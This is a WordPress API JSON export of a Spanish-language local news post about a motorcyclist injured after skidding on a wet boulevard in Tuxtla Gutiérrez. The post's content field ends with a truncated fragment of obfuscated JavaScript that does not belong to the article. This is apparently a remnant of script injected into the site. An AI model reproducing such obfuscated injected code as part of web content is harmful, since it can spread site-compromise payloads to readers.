{"id":25299,"date":"2025-11-19T03:01:23","date_gmt":"2025-11-19T03:01:23","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=25299"},"modified":"2025-11-19T03:01:24","modified_gmt":"2025-11-19T03:01:24","slug":"motociclista-herido-al-derrapar-su-unidad","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=25299","title":{"rendered":"Motociclista herido al derrapar su unidad"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"25300\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000444569-1024x576.jpg\" alt=\"\" class=\"wp-image-25300\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000444569-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000444569-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000444569-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000444569-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000444569.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"576\" height=\"1024\" data-id=\"25301\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000444568-576x1024.jpg\" alt=\"\" class=\"wp-image-25301\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000444568-576x1024.jpg 576w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000444568-169x300.jpg 169w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000444568-768x1365.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000444568-864x1536.jpg 864w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000444568.jpg 900w\" sizes=\"auto, (max-width: 576px) 100vw, 576px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-id=\"25302\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000444567-1024x576.jpg\" alt=\"\" class=\"wp-image-25302\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000444567-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000444567-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000444567-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000444567-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/11\/1000444567.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 18 de noviembre del 2025. Tuxtla Guti\u00e9rrez.- Este martes por la ma\u00f1ana un motociclista result\u00f3 herido al derrapar su unidad en el Bulevar \u00c1ngel Albino Corzo, en la zona Oriente de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales el conductor de la Italika FZ circulaba de Poniente a Oriente.<\/p>\n\n\n\n<p>Por el agua que hab\u00eda regada en la zona, derrap\u00f3 y perdi\u00f3 el control de su unidad para estrellarse contra el pavimento a la altura de la Plaza Las Palmas.<\/p>\n\n\n\n<p>Al lugar arribaron elementos de Protecci\u00f3n Civil para brindar los servicios prehospitalarios.<\/p>\n\n\n\n<p>La moto fue resguardada en el lugar por los compa\u00f1eros del lesionado.<\/p>\n\n\n\n<p>El conductor de la moto fue trasladado a un hospital para recibir atenci\u00f3n m\u00e9dica especializada.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 18 de noviembre del 2025. Tuxtla Guti\u00e9rrez.- Este martes por la ma\u00f1ana un motociclista result\u00f3 herido al derrapar su unidad en el Bulevar \u00c1ngel Albino Corzo, en la zona Oriente de Tuxtla Guti\u00e9rrez. De acuerdo con los reportes oficiales el conductor de la Italika FZ circulaba de Poniente a Oriente. Por &hellip;<\/p>\n","protected":false},"author":2,"featured_media":25302,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-25299","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25299","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=25299"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25299\/revisions"}],"predecessor-version":[{"id":25303,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/25299\/revisions\/25303"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/25302"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=25299"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=25299"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=25299"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}